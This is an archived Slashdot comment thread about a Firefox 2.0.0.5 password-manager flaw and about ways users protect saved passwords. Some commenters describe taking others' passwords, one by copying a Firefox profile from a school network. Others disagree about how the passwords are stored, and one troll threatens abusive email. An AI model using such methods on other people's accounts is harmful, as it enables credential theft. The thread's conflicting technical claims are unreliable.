Slashdot Mirror


Password Vulnerability In Firefox 2.0.0.5

Paris The Pirate writes "According to a message posted over the weekend on the Full-Disclosure mailing list, the latest version of Firefox, 2.0.0.5, contains a password management vulnerability that can allow malicious Web sites to steal user passwords. If you have JavaScript enabled and allow Firefox to remember your passwords, you are at risk from this flaw."

176 comments

  1. Is this OS independent? by sexybomber · · Score: 4, Interesting

    I haven't RTFA (after all, this is Slashdot), but are all OSes equally vulnerable?

    1. Re:Is this OS independent? by Compholio · · Score: 5, Informative

      I haven't RTFA (after all, this is Slashdot), but are all OSes equally vulnerable?
      I can confirm that it works on Linux.
    2. Re:Is this OS independent? by Mr.+Sketch · · Score: 5, Informative

      From what I read, yes. It only exposes passwords for the site you're visiting. The most common case of this is on myspace, where visiting a malicious website will transfer your myspace username/password to the website owner. This vulnerability exists on sites that allow users to post custom html and javascript and will expose your username and password for that site.

      This does not expose all your passwords, so if you have your bank password stored, it's safe, unless your bank has pages that allow users to post custom html and javascript.

    3. Re:Is this OS independent? by slagell · · Score: 3, Insightful

      Or unless you use the same password for myspace and a bunch of other places

    4. Re:Is this OS independent? by PPH · · Score: 4, Funny

      Memo to self: Take my /. password, 'ImADork' off my bank account.

      --
      Have gnu, will travel.
    5. Re:Is this OS independent? by Simon+Donkers · · Score: 2, Informative

      I have enabled the master password and the proof of concept fails. It launches a window asking me for my master password before filling in any passwords.

      Note that the master password on its own still is not secure because you only need to type it in once until you restart your browser but combined with the add-on Master Password Timeout you are relatively safe. Just don't browse dodgy websites minutes after logging in.

    6. Re:Is this OS independent? by jsse · · Score: 2, Funny

      I can confirm that it works on AmegaOS, Atrai, Sinclair ZX81 and PDP too.

      Well...actually I can't. If you excuse me, I'll go back to my corner where I can dialog with my shadow.

    7. Re:Is this OS independent? by snowgirl · · Score: 1

      You know... this is one reason why I don't store ANY of my passwords for webpages anywhere but my head.

      Granted my IMs all store my password, because I want them to log in automatically, but I just simply do not trust a webbrowser to keep any of my passwords.

      --
      WARNING! This girl exceeds the MAXIMUM SAFE standards established by the FDA for BRATTINESS
    8. Re:Is this OS independent? by 0olong · · Score: 0

      Actually you're safe if you use a master password with your password manager. This solution has the benefit that you can use any amount of unique strong passwords for different sites while you only need to remember one.

    9. Re:Is this OS independent? by snowgirl · · Score: 4, Informative

      Actually you're safe if you use a master password with your password manager.


      Well, this story kind of points out why, obviously, this statement isn't necessarily true.
      --
      WARNING! This girl exceeds the MAXIMUM SAFE standards established by the FDA for BRATTINESS
    10. Re:Is this OS independent? by Anonymous Coward · · Score: 3, Funny

      I already changed your bank password for ya.

      Dork.

    11. Re:Is this OS independent? by RealGrouchy · · Score: 5, Funny

      I haven't RTFA (after all, this is Slashdot), but are all OSes equally vulnerable?
      I can confirm that it works on Linux.

      TFA, or the vulnerability?

      - RG>
      --
      Hey pal, this isn't a pleasantforest, so don't waste my time with pleasantries!
    12. Re:Is this OS independent? by xsadar · · Score: 2, Insightful

      This does not expose all your passwords, so if you have you bank password stored, it's safe . . .
      It may be safe from this particular vulnerability, but I would never consider a stored password to be safe.
      --
      The only thing I know is that I don't know anything; and I'm not even sure about that.
    13. Re:Is this OS independent? by VJ42 · · Score: 0

      Whilst I keep my web mail, bank and other important passwords in my head, I have no problem letting my browser remember my /. password or the ones for any number of random forums that I am a member of; or letting it remember the password I got from bugmenot so I could read some article on a site that has no need of my personal info besides data harvesting (For some reason newspapers do this a lot).

      It's not as if someone changing the password on my /. account would do me any real harm, it's a weak password anyway, so why should I bother having to type it in every time I visit?

      --
      If I have nothing to hide, you have no reason to search me
    14. Re:Is this OS independent? by dougmc · · Score: 1

      You know... this is one reason why I don't store ANY of my passwords for webpages anywhere but my head.

      ... which probably means that your webpage passwords are probably all the same, or many are the same, or you just don't use many web sites that make you log in. Or you have superhuman memory, of course.

      Which is worse? Keeping the same password everywhere, or risking that there might be a hole in your browser at some point? (Or that somebody might hack into your box and copy the entire password file.) I'll have to say the first.

      Still, keeping your bank password (and other passwords that really matter) in your head is a good plan. But using the same password for systems that are controlled/administered separately? Bad idea.

    15. Re:Is this OS independent? by McNihil · · Score: 1

      Err.. you misspelled n1nc0mp00p

    16. Re:Is this OS independent? by rapidweather · · Score: 2, Informative
      ..and allow Firefox to remember your passwords..


      In Rapidweather Remaster of Knoppix Linux, my livecd linux distro, I always set up Firefox _not_ to remember passwords.
      I put Firefox 2.0.0.5 in the Remaster just last week.
      Also, when the user closes Firefox, I have it set up so the entire ~/.mozilla is deleted. I presume that is where any password would reside. In the event of a Firefox crash, the ~/.mozilla is not deleted without an OK from the user. There is a dialog box that comes up and asks "Did you want to close Firefox?".
      So, even though I do have Javascript enabled, I would assume from the discussion that the current, "in-use" password is safe. Usually, when I do online banking, I follow the recommendation to "close the browser", and with the above setup where ~/.mozilla is deleted, I should be safe.

      Rapidweather

    17. Re:Is this OS independent? by snowgirl · · Score: 1

      Ah, I generally use the website's password storage for that.

      Of course, I love when I use a "I forgot my password" program and they email me my password. It's like, "Um..... thanks?"

      I swear... seriously, everyone seems to have really poor password security, so I have a standard throw-away password for random sites that I don't particularly care if they go one way or the other.

      --
      WARNING! This girl exceeds the MAXIMUM SAFE standards established by the FDA for BRATTINESS
    18. Re:Is this OS independent? by asrail · · Score: 1

      Not if you've more than one login for that site, so it won't auto-complete.

      Test it... save two logins and try the exploit.

    19. Re:Is this OS independent? by PPH · · Score: 1
      Thanks, dude.


      While you're logged on, could you send me a couple of bucks for the weekend? If there's anything left, that is.

      --
      Have gnu, will travel.
    20. Re:Is this OS independent? by doom · · Score: 1
      sexybomber wrote:

      I haven't RTFA (after all, this is Slashdot),

      Listen: you don't get cute points on this kind of schtick, what you get is a big flashing sign on your head saying "I AM AN IDIOT".

      (Unfortunately, you did get karma out of it, because there are some moderators out there with similar equipment.)

  2. Dupe? by InvisblePinkUnicorn · · Score: 5, Informative
    1. Re:Dupe? by the.WZA · · Score: 1

      Yes. It's a dupe.

    2. Re:Dupe? by denttford · · Score: 1

      Yeah, the title seems to indicate that there is a vulnerability specific to the new FF release, but no. Same story.

      Same solution (for FF) - which I got from a post in the previous story (thank you): Secure Login.

      --

      Live the questions now.
    3. Re:Dupe? by Zekasu · · Score: 1

      It's not a "dupe" per se, but it has been posted before.

      ...and then again.

      ... and again.

      ... and then again.

      The only new bit of information about this is that it was disclosed in a meeting, which could be significant or insignificant, depending on the way you look at it.

  3. Password Remember Function by EveryNickIsTaken · · Score: 0, Flamebait

    This is one of the reasons why the "remember my passwords" function is only used by idiots.

    1. Re:Password Remember Function by SatanicPuppy · · Score: 5, Insightful

      Eh. Depends on what passwords you set it to remember. There are a ton of BS passwords that I don't give a damn if someone steals.

      Like anywhere else, you need to make a trade off between usability and security. Sure, it's not perfectly secure, but it's not worth it to me to have to remember the one off junk password I made up for NYTimes.com.

      The real issue, as usual, is javascript. I use "NoScript" and am careful about which sites I allow to execute scripts at all. That will do more for your security than anything else.

      --
      ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
    2. Re:Password Remember Function by mdm-adph · · Score: 1

      Same for me -- important passwords, like my bank's online account access, I never allow anything to save, not even Firefox.

      --
      It is by my will alone my thoughts acquire motion; it is by the juice of the coffee bean that the thoughts acquire speed
    3. Re:Password Remember Function by bensode · · Score: 1

      It's not a vulnerability ... it's an IE migration to Firefox feature!

      --
      "Keep at least 3-6 full bottles of hard alcohol on hand, a 2 week resignation notice,..." - Poetmatt
    4. Re:Password Remember Function by Anonymous Coward · · Score: 1, Funny

      Ah yes, the old "you are an idiot if you don't do things the way I do them" argument. Are we grumpy because we are out of Clearasil today? Or did mommy start asking for basement rent?

    5. Re:Password Remember Function by bahwi · · Score: 1

      Meh, if someone has access to my computer physically anyways they can get all my passwords by installing a keylogger anyways. The vulnerability only affects the sites that let people post custom html/javascript. Those sites are just social sites like myspace and other stuff and who cares if someone gets your password for that.

    6. Re:Password Remember Function by Tridus · · Score: 4, Funny

      I knew Post It Notes were more secure!

      --
      -- "So they told me that using the download page to download something was not something they anticipated." - Bill Gates
    7. Re:Password Remember Function by tygerstripes · · Score: 0

      Regardless of people's feelings on having their social-site password stolen, if this vulnerability allows someone on a social networking site to find your other passwords... oh, why am I bothering.

      --
      Meta will eat itself
    8. Re:Password Remember Function by DigitAl56K · · Score: 4, Insightful

      Who modded the parent post "Insightful", and why? It is a one line blanket statement cast against millions of people without discussion or foundation. I hope someone takes away your mod points.

      If you use many websites that require you to log in you don't have many options. You could use one password for all of them, in which case a breach on one account by an attacker essentially breaches all other accounts that they discover, or you can use unique passwords on each site, in which case it soon becomes impossible to remember them all accurately - especially for sites that you don't use very often. Additionally, some sites have rules around the number of upper case characters, special characters, digits, etc. in passwords, and these can be particularly difficult to remember.

      Certainly people are foolish if they store logins for bank accounts and the like in the password manager, but most people only have one or two really important logins.

      People who use the remember passwords functions are not idiots. People who expect the "remember passwords" functionality to be secure are not idiots either - if an application used by millions includes such functionality one would expect the developers to have secured it.

    9. Re:Password Remember Function by eck011219 · · Score: 4, Insightful
      There are a couple issues here. First of all ...

      Those sites are just social sites like myspace and other stuff and who cares if someone gets your password for that.

      You'd probably begin to care after someone "hacks" your MySpace page and posts distasteful or illegal language or images. Explaining all of that to a police officer or a judge and jury is rife with peril.

      But the other point I think is pertinent here is that Firefox is really going for the common man crowd -- you don't buy a full-page ad in the New York Times if you want only geeks. So knowing that the average joe will be using Firefox and will happily save sensitive information if encouraged to do so (as one is with Firefox), that particular feature really has to be pretty rock-solid (or at the very least, not vulnerable to a pretty basic and classic javascript exploit).

      Don't get me wrong -- I love Firefox and use it almost exclusively. But this is the kind of thing that, whether truly a hazard to most users or not, can scare people away if it is carelessly presented to the public. Or if it really is a risk.
      --
      It is pitch black. You are likely to be eaten by a grue.
    10. Re:Password Remember Function by EveryNickIsTaken · · Score: 0, Troll

      So, just because millions of people use it, expecting it to be secure, then it is suddenly a good idea to do so? Please... Millions of people use their real CC or debit card numbers when purchasing online (instead of one-off "disposable" numbers) - despite the inherent security threats... Does that suddenly become a good idea because millions of people use it, expecting it to be secure?

    11. Re:Password Remember Function by Anonymous Coward · · Score: 2, Insightful

      Why do idiots still spread the FUD that it is bad or a "security threat" to use their credit card online? You are perfectly safe. If someone does steal and use your number you are only responsible for the first $50, and every bank I've ever dealt with will waive that. Idiots like you are the reason it took me so long to convince my mom not to use PERSONAL CHECKS on eBay. Because of the FUD about credit cards, I had a hard time explaining to her that they were MUCH safer than checks! You are MORE vulnerable using your credit card in a "real" store than online.

    12. Re:Password Remember Function by Vexorian · · Score: 1

      I actually think gp is right to one extent.

      For the sites I don't care about I use the same generic old password that I have used from 2003, I mean, if they are stolen I just risk a bunch of dummy email addresses and other crappy services I don't really care too much about. For the things that matter I keep tough and strong passwords that I better remember and not "write them down" or let a browser keep them... Often things that matter are just 3 so memory is not an obstacle...

      --

      Copyright infringement is "piracy" in the same way DRM is "consumer rape"
    13. Re:Password Remember Function by networkBoy · · Score: 0

      Yes, but a patch is less than three weeks plus a day away (I'm betting less than 48 hours), whereas with a MS product that would be the earliest you could expect a patch (sans DRM issue). In all likelihood a MS patch would be 7 weeks away.
      -nB

      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
    14. Re:Password Remember Function by eck011219 · · Score: 1

      You're right -- I'm not arguing anything on behalf of other browsers (particularly IE -- as a guy who lives and breathes CSS all day, that alone has me hating IE). I'm just saying that the anyman's browser needs to provide protection IF it offers it. You could certainly make the password saving function an option you turn on instead of have to turn off. But that kind of hides it from new users who don't know where to look (or that there's anything to look for). I think better encryption defaults (like the creation of an administrative password as mentioned elsewhere) might be a better tactic.

      --
      It is pitch black. You are likely to be eaten by a grue.
    15. Re:Password Remember Function by LoverOfJoy · · Score: 2, Insightful

      Why must every decision either be the best, most secure, or one made by an idiot? Aren't there decisions that may not be the ideal or may have some downsides that aren't made by idiots?

    16. Re:Password Remember Function by dmpyron · · Score: 1

      If it has anything to do with money, or some place where I can be made to look like an idiot, I don't. If it's one of my travel agency sites, why not? The only thing you can do is book some travel, and I get the commission.

    17. Re:Password Remember Function by Anonymous Coward · · Score: 0

      Who modded the parent post "Insightful", and why? It is a one line blanket statement cast against millions of people without discussion or foundation. I hope someone takes away your mod points.
      Sorry -- that was me!
    18. Re:Password Remember Function by dwater · · Score: 1

      > You are MORE vulnerable using your credit card in a "real" store than online.

      Care to back that up?

      --
      Max.
    19. Re:Password Remember Function by Anonymous Coward · · Score: 0

      Actually, IE has never automatically populated the username/password... that's quite stupid on FX's part. In IE, you have to fill in the username manually and it will auto-fill the password (if it was one you told it to remember). Require user action.

  4. ho ho ho by Anonymous Coward · · Score: 0
    1. Re:ho ho ho by Anonymous Coward · · Score: 0

      ^ not troll.

  5. Do not save passwords by Normal+Dan · · Score: 1, Insightful

    I never liked firefox's save password ability. It stores the password in plane text (at least it used to) for anyone with physical access to see if they know where to look (and it's not hard to figure out where to look). I have stolen many a password this way. It is worse than writing your password down and putting it in your desk.

    --
    A unique way to learn a language: http://languageloom.com
    1. Re:Do not save passwords by Mascot · · Score: 5, Insightful
      That's what the "Master Password" option is for.

      Use a master password

              Firefox can protect sensitive information such as saved passwords
              and certificates by encrypting them using a master password. If you create a
              master password, each time you start Firefox, it will ask you to enter
              the password the first time it needs to access a certificate or stored
              password.
    2. Re:Do not save passwords by dvice_null · · Score: 3, Informative

      Passwords are not in plain text, but readable with Firefox.

      You can set a master password to truly encrypt them. But if you let people access your hard drive, you can install keyloggers to steal the master password also. Or any password, no matter whether you save it or not.

    3. Re:Do not save passwords by Anonymous Coward · · Score: 0

      or turn off JavaScript, and be also immune to the hundred other JavaScript-based attacks that have been found, and the hundred that will be found in the next 10 years.

    4. Re:Do not save passwords by Anonymous Coward · · Score: 2, Funny

      It stores the password in plane text (at least it used to) for anyone with physical access to see if they know where to look (and it's not hard to figure out where to look). I have stolen many a passwords this way. It is worse than writing your password down and putting it in your desk.

      Even worse, because it uses plane text, you are helping the terrorists, who can now hijack your passwords and fly them into skyscrapers!

    5. Re:Do not save passwords by piojo · · Score: 1

      I never liked firefox's save password ability. It stores the password in plane text (at least it used to) for anyone with physical access to see if they know where to look (and it's not hard to figure out where to look).

      I don't know whether they are in plaintext, but it matters very little. I found someone's firefox profile directory on my school's network, and looked for passwords because I was bored. I couldn't see anything, so I just copied the profile to my computer, and fired up firefox using that profile. It happily showed me all the passwords at my request. I think the same procedure would work for opera, or any browser that stores passwords. Obfuscated passwords probably only protect you from your younger siblings. (The older ones found your porn collection years ago.)

      Now, there is one way I can think of that would make the obfuscation better. The browser could encrypt the passwords using the URL that they go to as the encryption key. (Obviously, the browser could not store this information with the password.) When a user browsed to www.example.com, the browser couldn't ask, "Do we have a saved password for www.example.com?" but it would instead say, "Here are all my passwords... when decrypted with the key, 'example.com', do they yield plaintext that looks like it could be a password?"

      This approach is not really secure (because crackers would just take password lists and try decryption keys like "paypal.com" and "ebay.com" to get common/important passwords), but it has the advantage that it is impossible to start with no knowledge and end up with a list of site,username,password sets.

      --
      A cat can't teach a dog to bark.
    6. Re:Do not save passwords by suv4x4 · · Score: 1

      It stores the password in plane text

      Shit, that's totally insecure! Way to go, Mozilla!

    7. Re:Do not save passwords by strobert · · Score: 4, Informative

      In addition if you run with Noscript and Secure Login it really helps protect you. The former can let you disable javascript (and java/flash too) by default and only enable for sites you trust. The latter makes it so that for remembered passwords firefox does not fill in the form. Instead it highlights the fields it would fill in and you have to hit the secure login button to post the form data. Makes it so that you know when your saved passwords are being used and bypasses the input flow so that keyloggers can't even record the data.

      I would also recommend installing "Master Password Timeout" which will re-prompt you periodically for the password.

    8. Re:Do not save passwords by Anonymous Coward · · Score: 0

      yeah and the plane text is always flying away LOL!

    9. Re:Do not save passwords by Anonymous Coward · · Score: 0

      Why steal passwords???.....what U need em for? huh?

    10. Re:Do not save passwords by eln · · Score: 4, Funny

      Pretty much all text is plane text. Unless it's 3 dimensional I guess.

    11. Re:Do not save passwords by ma1wrbu5tr · · Score: 1

      "plane text" .... is that the stuff printed on barf bags?

      --
      Why can't we go back to using jumpers to configure slot adapter cards? Why? I say!
    12. Re:Do not save passwords by My+name+is+Bucket · · Score: 1

      Let me get this straight...
      You don't want to go through the trouble of memorizing and typing in passwords, so you store them. But then, you don't want your passwords to get intercepted so it prompts you for a password every time you have to enter a password so you don't have to enter a password every time it prompts you. Now you conveniently have all your passwords managed by a single password which is better than having a single password for all your accounts because you don't want a cracker getting access to all your online services at once just by acquiring a single password.

      Makes perfect sense.

    13. Re:Do not save passwords by TigerTime · · Score: 1

      I don't want to be nagged with entering a password every time I open up Firefox. What I want is all of my passwords to be secured or completely hidden from everyone. I don't know how to look up my passwords in IE, but in Firefox it's right there in "plane" site.

      What Firefox needs to do is when you click on the "Show Passwords" link, the user must be required to enter in the "Master Password" then and only then. That's the only time it's really necessary to go to an extra level of security.

      Passwords are personal, and they shouldn't be visible to anyone you happen to let use your computer for a second. And I don't want to have to type in the "Master Password" anytime they want to check their email.

    14. Re:Do not save passwords by organgtool · · Score: 1

      It stores the password in plane text
      So your password is probably one of the entries here
    15. Re:Do not save passwords by LordKronos · · Score: 2, Insightful

      Did I detect a hint of sarcasm? Well then let me explain it for you.

      Suppose you signup for online banking and setup a password. Then you signup for some stupid website and use the same password. The problem is, you don't know if you can trust that 2nd site with your online banking password. They may just be phishing for passwords. Or maybe they are honest but incompetent enough to store your password in the DB in plain text, conveniently waiting there for the next hacker to locate.

      The solution: Use separate passwords for the 2 sites? But then how do you start partitioning things? Do all the banking sites get the same password, your email a different password, your photo website a separate password, etc? Can you even trust all banks to have the same password? Perhaps it would be safer to use a different password for each one.

      By now you are looking at dozens of different passwords. Trouble is...how do you remember them all? Write them all down? That's a big no-no. However, what if you put them in a text file and then encrypted the file? Now you only have to remember 1 thing...the decryption key, and that NEVER has to be given to anyone.

      But no, I guess sarcastic mocking is funner, isn't it?

    16. Re:Do not save passwords by SleepyHappyDoc · · Score: 1

      Write them all down? That's a big no-no.

      I really don't understand why this is considered insecure. My front door gets much fewer intrusion attempts than my firewall, and I have a very secure system in place there to restrict access (a deadbolt). If someone did break into my house and stole my password list, I'd know as soon as I got home, rather than having to wait until I see suspicious activity on my accounts. I get why keeping your work password on a sticky-note in your cubicle is a bad idea, but I don't see why it would be so bad for home users, where physical access is already restricted.

      --
      Stasis is death. Embrace change.
    17. Re:Do not save passwords by TheVelvetFlamebait · · Score: 1

      It is worse than writing your password down and putting it in your desk.
      You're right! From now on, I'm going to write all my passwords, with the sites they correspond to, on a sheet of paper pinned to my desk. Any leet hacker looking through my computer will be so frustrated with the lack of a password manager file, that they'll just completely forget to look on the desk beside them, right? Right?
      --
      You know, there is a difference between trolling and pointing out the flaws in your reasoning. Just saying.
    18. Re:Do not save passwords by Mascot · · Score: 1

      Passwords are personal, and they shouldn't be visible to anyone you happen to let use your computer for a second.

      If you use the master password, they are not. Regardless of whether you have already been prompted for it, it will ask again if you try to reveal passwords in the list "show passwords".
    19. Re:Do not save passwords by LordKronos · · Score: 1

      Because my post wasn't addressing your specific scenario, but a general scenario instead. It might not be your personal banking password (which you use at home) that we are referring to. Instead, it might be passwords you use at the office, including internal accounts (email, accounting database, website administration), external business accounts (accounts with suppliers and other business partners, administering the retirement and health insurance plans, etc), and maybe even some personal accounts that you access on your lunch hour.

  6. Open Sores Get Whats Coming To Them by Anonymous Coward · · Score: 0

    Thats what you get for your 'security through open sores' lectures we have had to endure over the years.

    I'm going to log in to your email and send your mother all the gay porn I can find.

    That horny slut will love having all that cock on her screen.

    1. Re:Open Sores Get Whats Coming To Them by grub · · Score: 1


      I'm going to log in to your email and send your mother all the gay porn I can find.

      That would be found in a tarball of your home directory.

      --
      Trolling is a art,
    2. Re:Open Sores Get Whats Coming To Them by BlueParrot · · Score: 1

      link?

    3. Re:Open Sores Get Whats Coming To Them by networkBoy · · Score: 1
      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
  7. Duplicate? by Anonymous Coward · · Score: 0
  8. Or Firefox for that matter by benhocking · · Score: 3, Funny

    All the truly intelligent people use Lynx.

    --
    Ben Hocking
    Need a professional organizer?
  9. No Problem by Mostly+a+lurker · · Score: 1

    "... If you have JavaScript enabled and allow Firefox to remember your passwords, you are at risk from this flaw."
    Will not effect me: I have a notoriously bad memory for passwords.
    1. Re:No Problem by Anonymous Coward · · Score: 0

      It's good that you don't let your passwords define you, but the real question is whether or not this will affect you.

    2. Re:No Problem by petercruickshank · · Score: 1

      You mean your memory is so bad, even your copy of Firefox can't remember passwords?

  10. Low security passwords by benhocking · · Score: 3, Funny

    Eh. Depends on what passwords you set it to remember. There are a ton of BS passwords that I don't give a damn if someone steals.
    Absolutely. My Slashdot password, for example, is one that I allow Firefox to remember. Er, not that I'm claiming Slashdot is BS or anything. ;)
    --
    Ben Hocking
    Need a professional organizer?
  11. NoScript by grub · · Score: 5, Informative

    NoScript
    Repeat ad nauseum.

    --
    Trolling is a art,
    1. Re:NoScript by Aladrin · · Score: 1

      No joke, right? I forget the exact vulnerability that recently made me install NoScript, but there's been enough cross-site scripting, ajax, and stored-password exploits recently to make anyone paranoid.

      --
      "If you make people think they're thinking, they'll love you; But if you really make them think, they'll hate you." - DM
    2. Re:NoScript by that+IT+girl · · Score: 1

      I guess it could be exploited even through the sites you allow, though.
      Just another reason not to save your passwords. It's as easy to get to that as it is if I saved all my passwords in a document on my desktop, labeled "Passwords". Pfft.

      --
      10 FILL MUG WITH COFFEE
      20 DRINK COFFEE
      30 GOTO 10
    3. Re:NoScript by grub · · Score: 1

      Funny thing. The first and only cross-site warning I've had with NoScript was on our corporate webmail site.

      --
      Trolling is a art,
    4. Re:NoScript by Anonymous Coward · · Score: 0

      ad nauseAM

      Easy to remember: it is just like when you puke darling.

    5. Re:NoScript by Aladrin · · Score: 1

      It's like a condom... It's not there because it's necessary every time. It's there for the one time you really really need it.

      --
      "If you make people think they're thinking, they'll love you; But if you really make them think, they'll hate you." - DM
    6. Re:NoScript by LuSiDe · · Score: 1

      I guess it could be exploited even through the sites you allow, though.
      True, but you only add sites you trust which severely lowers the chances.

      One can certainly save their passwords. Just don't save them directly in a monolithic application which is highly interactive with the Internet such as a web browser. Use something like a virtual wallet such as KDE's Kwallet (GNOME has a similar feature). This way you assign complex passwords (8 random characters, alpha-numeric, CaSe SeNsiTiVe) e.g. made with the command apg which you all save in your Kwallet (or applications such as LUKS, GELI, GPG, or TrueCrypt can be used for this purpose). Your Kwallet you put a master password on, and this is the only password you have to remember. Various applications can directly access Kwallet (KDE applications such as Konqueror) however should your application not support this you can manually open your Kwallet.

      Should you use LUKS, GELI, GPG, or TrueCrypt be sure to close the mount point after you accessed the data. Eventually, one could put this on their PDA using that to store the data instead of directly on a machine connected to the Internet. Although I don't have a PDA, I do like this setup. You securely save your passwords and have them with you the whole time, but it does cost time and energy to retrieve the password. Hence, you do have a backup, while your data cannot be read from the desktop(s) themselves, whereas you circumvent becoming too lazy to remember your passwords because accessing the data on the PDA costs a minute or so.
      --
      WE DON'T NEED NO BLOG CONTROL.
    7. Re:NoScript by Bacon+Bits · · Score: 5, Insightful

      NoScript is a horrible fix for this, because NoScript and the password manager use the same method to determine what is safe: the domain name of the server.

      If I go to, say, Blogspot.com with FF and I'm a member, I probably log in and save my password with FF. If I have NoScript and I visit the page frequently and post lots of comments, I also probably have blogspot.com on the trusted site list. If I go to a malicious blog (well, alright, a blog that exploits this vulnerability -- they're all malicious) then a) I'll be on a site that the password manager trusts and b) I'll be on a site that NoScript trusts.

      --
      The road to tyranny has always been paved with claims of necessity.
    8. Re:NoScript by networkBoy · · Score: 1

      Well... I guess it's better than a car analogy.
      -nB

      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
    9. Re:NoScript by Aladrin · · Score: 1

      Crap. I'll try harder next time. Fix-a-flat maybe? Wouldn't need much change in the wording, either.

      --
      "If you make people think they're thinking, they'll love you; But if you really make them think, they'll hate you." - DM
    10. Re:NoScript by Nozsd · · Score: 1

      How is NoScript a fix? If you browse sites with scripting ON as the default, wouldn't it be a little too late to turn off scripting after visiting a malicious site? And how would you know a site is malicious if you browse sites with scripting OFF as the default? You might think the site is safe and turn on scripting only to find out it wasn't safe at all, but then it's too late.

      --
      When you have finished this cup of coffee your adventure will begin again.
    11. Re:NoScript by Anonymous Coward · · Score: 0

      Browsing with scripting defaulted to ON is retarded. That's why sane people run NoScript and allow sites on a case-by-case basis. True, a malicious site could be whitelisted, but running with the equivalent of the whole Internet whitelisted isn't very smart.

    12. Re:NoScript by Kingrames · · Score: 1

      Then don't go to blogspot.com.
      If the website allows that kind of malicious behavior, then they need to change.

      --
      If you can read this, I forgot to post anonymously.
    13. Re:NoScript by Bacon+Bits · · Score: 1

      Yes, that's brilliant. I guess we don't need to worry about IE security flaws either, then? They have workarounds, too! Ah well, and /. has such fun railing MS for it, too.

      --
      The road to tyranny has always been paved with claims of necessity.
    14. Re:NoScript by ekhben · · Score: 1

      That said, is there a good Add-on for Firefox that handles password-management more securely? Something that keeps them stored in an encrypted format would be a step in the right direction.

      They look encrypted to me. Base 64 encoded text that decodes to unprintable characters, for both username and password. Of course, I don't have a master password set, so anyone who knows the encryption scheme used by Firefox would be able to decode them in any case. And even if I did use a master password, my browser is happy to supply my slashdot username and password to anything in the "slashdot.org" domain. So the discussed vulnerability would still apply.

      If you're using the same password everywhere, why have FF remember it for you? If not, who gives a shit if some lame duck web site lets any old user put HTML and Javascript carelessly on their domain name, you're only losing your password to a web site you probably should avoid anyway (hint: any old user putting any old JS on a site means every possible browser vulnerability will be attacked and exploited sooner or later, NoScript the site or don't visit).

    15. Re:NoScript by Anonymous Coward · · Score: 0

      the fault has to lay somewhere, dumbass. where does the fault lay here ? hundreds of maliciouswebsites.blogspot.com . is it your fault ? no. is it blogspot.com's fault ? yes. you still want to use this web site ? you may have a bigger problem than you think, sir.

    16. Re:NoScript by tbetz · · Score: 1

      The current version of NoScript allows you to permit or deny javascript based on the fqdn.

      So if I allow javascript on myblog.blogspot.com, I can continue to deny it on blogspot.com in general.

    17. Re:NoScript by Bacon+Bits · · Score: 1

      And every site on the Internet is like this? They *all* use the FQDN to distinguish one page from another?

      --
      The road to tyranny has always been paved with claims of necessity.
  12. Passwords in general by the.nourse.god · · Score: 5, Insightful

    And this is why I save all of my passwords in IE

    This is why we need something better than text passwords for authentication on the web. Most people can't remember all the passwords they use on every site they go to. To cope with this, Average Users do either one of two things - use the password remembering method in their browser of choice or use the same (weak) password for everything. Granted, there are some decent password management utilities out there, but your Average User would rather use a tool they already have.

    1. Re:Passwords in general by Anonymous Coward · · Score: 0

      The best password manager is a pencil and a piece of paper. At work or if there are others besides you at home, the third tool in the password manager set is a locked drawer.

    2. Re:Passwords in general by Anonymous Coward · · Score: 0
    3. Re:Passwords in general by CBravo · · Score: 1

      This is why we need something better than text passwords for authentication on the web.
      Well you could use a USB stick which emulates a keyboard that can insert username/password combinations. Or you could use standard encryption methods... (signing, etc).
      --
      nosig today
  13. Wimp by missing000 · · Score: 2, Funny

    Real men use telnet for every IP session.

    1. Re:Wimp by dattaway · · Score: 4, Funny

      telnet is for weenies.

      netcat is for men.

    2. Re:Wimp by Anonymous Coward · · Score: 5, Funny

      i just attach the cables to my nipples and decode the packets manually.

    3. Re:Wimp by rleibman · · Score: 5, Funny

      i just attach the cables to my nipples and decode the packets manually.

      Yeah, but can you generate outbound traffic?

    4. Re:Wimp by crazyvas · · Score: 1

      Netcat over telnet is for men with weenies.

    5. Re:Wimp by kayditty · · Score: 1

      telnet is a protocol laid upon TCP (and, more commonly, a program translating that protocol to standard output). it would be impossible for me to use it for every "IP session," since there are other IP protocols that make use of sessions (some of which I do use).

    6. Re:Wimp by uradu · · Score: 1

      > decode the packets manually

      Manually?! Wouldn't your hands be otherwise engaged?

    7. Re:Wimp by LordEd · · Score: 2, Funny

      Outbound traffic is sent back on a different port.

    8. Re:Wimp by gentooligan · · Score: 1

      Using tc-pee-dump

  14. Dupe? Of course! by IBBoard · · Score: 2, Informative

    Yeah, it's the same issue. On the plus side, they don't link to the same article (unless you count the fact that this one links to an article that links to the article from the old one)

  15. Not as bad as you think. by Anonymous Coward · · Score: 1, Insightful

    It's not possible for websites to steal saved passwords from other websites; it's only possible to steal a password if Firefox auto-fills a password field, and obviously this only occurs if you're on a website you saved the password for in the first place.

    Reading my list of saved passwords, my company intranet sites aren't vulnerable, my bank website isn't vulnerable, my shopping sites aren't vulnerable. All that is vulnerable are forum websites, and that's only if someone finds a way to inject Javascript, which is normally stripped out by all of them.

    I don't think it's possible to avoid this without serious hijinks to the DOM; it has always been possible to inspect the current contents of form inputs, including password inputs.

  16. Please Help!! by The+Real+Normal+Dan · · Score: 5, Funny

    Very funny you jerk! You steal my password, then mock me on my slashdot account! Is there an admin around? -The Real Normal Dan

  17. Again? by HouseArrest420 · · Score: 2, Insightful

    How is this news again? If you have enough knowledge to post a slashdot article, it's certainly not your first time here, and one would hope you saw the SAME issue from 3-6 days ago.

    --
    This is Slashdot! Give me the latest gadget, bug, or OS project! This ain't english class so don't confuse the two!
  18. Meh by Anonymous Coward · · Score: 0
    As the announcement says:

    "evil" server pages can steal passwords from browsers whether the user has opted for password management by Firefox or not.
    It's the website's responsibility not to allow evil JavaScript on its domain. If they do - well, then all bets are off anyway...
  19. FUD by jrumney · · Score: 4, Informative

    Firefox's password file has never been in plain text, although if you don't specify a master password, the decryption key is stored in the same directory, so the encryption will only stop casual opportunists.

    1. Re:FUD by laddiebuck · · Score: 1

      Last I checked, it's just base64-encoded -- no encryption by default.

    2. Re:FUD by Anonymous Coward · · Score: 0

